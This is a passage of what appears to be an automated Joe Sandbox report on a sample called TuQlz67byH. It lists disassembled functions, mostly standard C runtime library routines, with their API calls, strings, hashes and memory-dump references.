Instruction ID: 4595e874f6c9f4fc542f4953e0a4440b0a2cccce676f22fb2bc3e8eead08457e
Opcode Fuzzy Hash: b4e7673223455bed37201a2f6dd9b9a3c58798056fd3665498f5efbb45f3b8f7
Instruction Fuzzy Hash: 12E048302402C8BBEF211B72ED8FF1D3E559B10B55F101025FA0CF80E1D7B2DA558684

Function 00EE06EF Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,00EDF713,00000000,00000001,00000000,00000000,?,00ED7B44,00000000,00000000,00000000), ref: 00EE0706
GetLastError.KERNEL32(?,00EDF713,00000000,00000001,00000000,00000000,?,00ED7B44,00000000,00000000,00000000,00000000,00000000,?,00ED80CB,00000000), ref: 00EE0712

Part of subcall function 00EE06D8: CloseHandle.KERNEL32(FFFFFFFE,00EE0722,?,00EDF713,00000000,00000001,00000000,00000000,?,00ED7B44,00000000,00000000,00000000,00000000,00000000), ref: 00EE06E8

___initconout.LIBCMT ref: 00EE0722

Part of subcall function 00EE069A: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00EE06C9,00EDF700,00000000,?,00ED7B44,00000000,00000000,00000000,00000000), ref: 00EE06AD

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,00EDF713,00000000,00000001,00000000,00000000,?,00ED7B44,00000000,00000000,00000000,00000000), ref: 00EE0737

Memory Dump Source

Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 3f33261ac39601d8d161968a50fd177ff88c688734a9532bc095fe8e05f16207
Instruction ID: 456d6d2ec4bfc72d9e7a1dced5325d749c31971f2b68086ada43c0666c47ad1b
Opcode Fuzzy Hash: 3f33261ac39601d8d161968a50fd177ff88c688734a9532bc095fe8e05f16207
Instruction Fuzzy Hash: 3DF012360011DDBFCF222FA6DC48A893FA5FB493A1B004010F91DBA520D6718960DF90

Function 00EC3FAF Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 294COMMON

Download Yara Rule

APIs

_strcspn.LIBCMT ref: 00EC4034
_strcspn.LIBCMT ref: 00EC4058

Strings

ji!^, xrefs: 00EC3FB8

Memory Dump Source

Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID: _strcspn
String ID: ji!^
API String ID: 3709121408-848646596
Opcode ID: e71c30a68fb76b1d082b52d0a67ae730ab45ce9d9b98d9d92285508cada33b19
Instruction ID: 23655e94240dbaf8d04ee4ccde47e2ee6534c020f6224b8fdfb8b57c2ee5ba87
Opcode Fuzzy Hash: e71c30a68fb76b1d082b52d0a67ae730ab45ce9d9b98d9d92285508cada33b19
Instruction Fuzzy Hash: C9C158B1508345AFCB14DF24C991EABBBF9EF88304F04991EF89497261D331E906CB92

Function 00EE1093 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,00EE09EF), ref: 00EE10AC

Strings

Li, xrefs: 00EE1241
R[, xrefs: 00EE1176, 00EE1220, 00EE1266

Memory Dump Source

Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID: DecodePointer
String ID: Li$R[
API String ID: 3527080286-2265778396
Opcode ID: 79c5eb4c95bf191ae68ace8184497cd48b97e0ccd9a37adb24a4001c1767129c
Instruction ID: 16c1dc9b7aa2ad24280795ed2095e879217e1eee21f738bd96916fd4c7ace693
Opcode Fuzzy Hash: 79c5eb4c95bf191ae68ace8184497cd48b97e0ccd9a37adb24a4001c1767129c
Instruction Fuzzy Hash: 89519D7090068EDBCF108FABD84C1FD7BB4FF89308F106185E691B7225CB758AA99B55

Function 00ED85EC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132fileCOMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00ED863C
ReadFile.KERNEL32(?,?,00001000,?,00000000,00ED8385,00000001,00000000,00EC61BC,00000000,?,?,00000000,?,?,00ED8808), ref: 00ED86C2

Strings

ji!^, xrefs: 00ED85FB

Memory Dump Source

Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID: FileReadUnothrow_t@std@@@__ehfuncinfo$??2@
String ID: ji!^
API String ID: 1834446548-848646596
Opcode ID: 59d63cd2275bc894cc572911972604fabdf1636d4cf3f8014b2be9a1a34b8644
Instruction ID: 367f45f46dd695103727549f036de4f9799cdf0143e45fb14f6f688ff4673843
Opcode Fuzzy Hash: 59d63cd2275bc894cc572911972604fabdf1636d4cf3f8014b2be9a1a34b8644
Instruction Fuzzy Hash: 0141B375A001989BDB21CF28CE80BE9B7B5FB48314F2491EBE549E6341DB75DEC28B50

Function 00ECA96D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 00ECA992

Strings

RCC, xrefs: 00ECA9AC
MOC, xrefs: 00ECA9A4

Memory Dump Source

Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: f5878ca0c8dadf3c1abf36add785c79908cdc095b21db2220f13c21f1570ccee
Instruction ID: d419f75c356c4dece85425a3159d4b3bd5c6402ad2db5a8929b028e3899598f3
Opcode Fuzzy Hash: f5878ca0c8dadf3c1abf36add785c79908cdc095b21db2220f13c21f1570ccee
Instruction Fuzzy Hash: D441177190020DAFCF16DF98CA81FEEBBB5BF48308F195069FA14B6211D3369952DB52

Function 00ED7DC3 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,00000000,?,00000000,00ED813A,00000000,00000000,00000000,?,0000000C,00000000,00000000,?,00000000,00EEC420), ref: 00ED7EAC
GetLastError.KERNEL32(00ED813A,00000000,00000000,00000000,?,0000000C,00000000,00000000,?,00000000,00EEC420,00000010,00ECF4E9,00000000,00000000,00000000), ref: 00ED7EDC

Strings

ji!^, xrefs: 00ED7DD2

Memory Dump Source

Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID: ErrorFileLastWrite
String ID: ji!^
API String ID: 442123175-848646596
Opcode ID: 352e28923ecb17a3a53e7fefe2c46fd38c4099699548a932999787b3070aee27
Instruction ID: a19339d93bdf52b97faebf912f8ef652e7bc7f05b0876ed0591f3a9167f7b5b4
Opcode Fuzzy Hash: 352e28923ecb17a3a53e7fefe2c46fd38c4099699548a932999787b3070aee27
Instruction Fuzzy Hash: D6318371B00219AFDB14CF69DC81BEA73A5EB44344F1450EEE905E7390E630EE868B60

Function 00ED8D25 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 102COMMONLIBRARYCODE

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(?,00000000,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,E8458D00), ref: 00ED8DF5
__freea.LIBCMT ref: 00ED8E04

Part of subcall function 00ED3A83: HeapAlloc.KERNEL32(00000000,00EDA1AA,?,?,00EDA1AA,00000220,?,?,?), ref: 00ED3AB5

Strings

ji!^, xrefs: 00ED8D2D

Memory Dump Source

Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID: AllocHeapStringType__freea
String ID: ji!^
API String ID: 2523373117-848646596
Opcode ID: b1032736025f26db4df7d74c58c41524b6a015cdb553532fbba0855ef4ff419a
Instruction ID: aeb64d1b23d517fed5350d2c9170dd99cda47ae753f4fd472b038ca452a7b17f
Opcode Fuzzy Hash: b1032736025f26db4df7d74c58c41524b6a015cdb553532fbba0855ef4ff419a
Instruction Fuzzy Hash: FB31D271A0021AABCF219F65CD45EAF7BA9EF44714F04152AFC14BB291DB35CD52CB90

Function 00EC5D41 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98COMMON

Download Yara Rule

APIs

__Wcrtomb.LIBCPMT ref: 00EC5DA1
__Wcrtomb.LIBCPMT ref: 00EC5DCF

Strings

ji!^, xrefs: 00EC5D47

Memory Dump Source

Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID: Wcrtomb
String ID: ji!^
API String ID: 2723506260-848646596
Opcode ID: 7c64c0942b17f53126a51bd8635596430c581cfb1b1383f2fd72514d9e0f8f64
Instruction ID: 5235a5646cf6e560ae8b022e5b68b3b48040d5709c68d3a7136662ddd3855039
Opcode Fuzzy Hash: 7c64c0942b17f53126a51bd8635596430c581cfb1b1383f2fd72514d9e0f8f64
Instruction Fuzzy Hash: 5531F9B2A0021ADFCB04CF58C981EAEB7F5FF58300B20446DE955EB301E735AA52DB60

Function 00ED7CDA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000,?,00ED8125,00000000,00000000,00000000,?,0000000C,00000000), ref: 00ED7D84
GetLastError.KERNEL32(?,00ED8125,00000000,00000000,00000000,?,0000000C,00000000,00000000,?,00000000,00EEC420,00000010,00ECF4E9,00000000,00000000), ref: 00ED7DAA

Strings

ji!^, xrefs: 00ED7CE9

Memory Dump Source

Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID: ErrorFileLastWrite
String ID: ji!^
API String ID: 442123175-848646596
Opcode ID: dc72e320625187966cf20f9b819ec218b4bfb85fe13c383ff3ab5f8865028ee8
Instruction ID: 70b00a4fc7986d88afd896c24b9ab01b116ff7aa9876e794505fcc98601085f3
Opcode Fuzzy Hash: dc72e320625187966cf20f9b819ec218b4bfb85fe13c383ff3ab5f8865028ee8
Instruction Fuzzy Hash: 23216531A042189FCB15CF29DC81AE9B7F6FF49314B1445AAE959EB350E730DE86CA60

Function 00ED7BFF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000,?,00ED814C,00000000,00000000,00000000,?,0000000C,00000000), ref: 00ED7C9B
GetLastError.KERNEL32(?,00ED814C,00000000,00000000,00000000,?,0000000C,00000000,00000000,?,00000000,00EEC420,00000010,00ECF4E9,00000000,00000000), ref: 00ED7CC1

Strings

ji!^, xrefs: 00ED7C0E

Memory Dump Source

Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID: ErrorFileLastWrite
String ID: ji!^
API String ID: 442123175-848646596
Opcode ID: e719cad4f6e4df039c49e82240693797da7a3c1827513709bcde6e26de37e0e4
Instruction ID: e772eab763e02fecedc6bf9fa609ac440cd643bb34162819b159a8a87ae1614a
Opcode Fuzzy Hash: e719cad4f6e4df039c49e82240693797da7a3c1827513709bcde6e26de37e0e4
Instruction Fuzzy Hash: 8821B130A142199FCF15CF2ADC80AD9B7B9EB4C301F2444AAE946E7311E631DE47CB60

Function 00ED5252 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00ED529E
GetFileType.KERNEL32(00000000), ref: 00ED52B0

Strings

pEt, xrefs: 00ED52E1

Memory Dump Source

Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID: FileHandleType
String ID: pEt
API String ID: 3000768030-1909899047
Opcode ID: 305d5f7ea37296fb1297b9a667251e7c1b6fcfc5844203f7474730432072d6ed
Instruction ID: dc039bd9db9bf120238699a16161f570199eebeeddcdc52a5eecff609b78b9a3
Opcode Fuzzy Hash: 305d5f7ea37296fb1297b9a667251e7c1b6fcfc5844203f7474730432072d6ed
Instruction Fuzzy Hash: 3A117533504F414ACB308A3E9C885227AB5E767334B34271BD5B6A67F1D670D98FD681

Function 00EC6CA2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00EC7643
___raise_securityfailure.LIBCMT ref: 00EC772B

Strings

ji!^, xrefs: 00EC770C

Memory Dump Source

Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: ji!^
API String ID: 3761405300-848646596
Opcode ID: 8051d1449231850ec255a391f080a38078112eb31ff5bcf8993f0ba088275cb2
Instruction ID: ec8c6104b604b0416ec2ce415644be43fb69d8f4884a86f4035347e461d0d0d4
Opcode Fuzzy Hash: 8051d1449231850ec255a391f080a38078112eb31ff5bcf8993f0ba088275cb2
Instruction Fuzzy Hash: 2421DDB854030C9AE704CF1AED86B503BE4FF2B304F10542AE908DB3A0E7B19985EF06

Function 00EC5107 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00EC5113
std::_Lockit::~_Lockit.LIBCPMT ref: 00EC516F

Strings

R[, xrefs: 00EC513A, 00EC5154

Memory Dump Source

Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_
String ID: R[
API String ID: 593203224-3972925902
Opcode ID: e94325590718319949582d583e50540059c6e184871fe33fe6ef3db7b911cd5d
Instruction ID: 747265c09892a603ae732b671a757273fd0932a970fce2b6cf951af448690db1
Opcode Fuzzy Hash: e94325590718319949582d583e50540059c6e184871fe33fe6ef3db7b911cd5d
Instruction Fuzzy Hash: 26018C71600918AFCB10EB25C999F9D7BB9EF85714B08009DE802AB3A1DF71FE46CB50

Function 00EC15DF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00EC15E6
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00EC161E

Part of subcall function 00EC5178: _Yarn.LIBCPMT ref: 00EC5197
Part of subcall function 00EC5178: _Yarn.LIBCPMT ref: 00EC51BB

Strings

bad locale name, xrefs: 00EC162C

Memory Dump Source

Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: ae4f28add717a7d93c58d78244ece8afff70605a3a86e623b34642e9bb16cf6d
Instruction ID: d54d03a0e15d512d9b1bc40c236651c12f6224b212b9942c3a7fa84711145c9c
Opcode Fuzzy Hash: ae4f28add717a7d93c58d78244ece8afff70605a3a86e623b34642e9bb16cf6d
Instruction Fuzzy Hash: 49F01DB1505B909E83319F7A8581947FBE4BE293103949E6EE0DED3A11D731A405CB6A

Function 00ED62A6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 00ED62E6

Strings

R[, xrefs: 00ED62D6
InitializeCriticalSectionEx, xrefs: 00ED62B6

Memory Dump Source

Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx$R[
API String ID: 2593887523-432795312
Opcode ID: 5b90d349bfab390199f5e726a8e4592a25a4213a4aca2edcb16e3941bdc6cc43
Instruction ID: 6199133fe87fc65e2d596330dbd7986195c8f17aae46e8fc2c925517386e1b2e
Opcode Fuzzy Hash: 5b90d349bfab390199f5e726a8e4592a25a4213a4aca2edcb16e3941bdc6cc43
Instruction Fuzzy Hash: BEE09B3264025CBBCF112F62EC06E9E7F15DB447A1B005011FD1839261C772D921D6C4

Function 00ED612C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 00ED6160

Strings

FlsAlloc, xrefs: 00ED613C
R[, xrefs: 00ED6156

Memory Dump Source

Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID: Alloc
String ID: FlsAlloc$R[
API String ID: 2773662609-3428055260
Opcode ID: ad449e461f156a611e0408f184a34fb7df0229cb3ec23c1ebf106eeebb7373e7
Instruction ID: df7d8db74fec565629d959f44dddc4536de54f3da7b24cb0cafb13eddd5d3164
Opcode Fuzzy Hash: ad449e461f156a611e0408f184a34fb7df0229cb3ec23c1ebf106eeebb7373e7
Instruction Fuzzy Hash: 2BE0C2366857AC77C33126B3AC0AE9E7A14CB44B61B002022FA087A3C2DAA59E0192D5

Function 00EDA5AE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON

Download Yara Rule

APIs

GetCommandLineA.KERNEL32 ref: 00EDA5AE
GetCommandLineW.KERNEL32 ref: 00EDA5B9

Strings

&s, xrefs: 00EDA5B4

Memory Dump Source

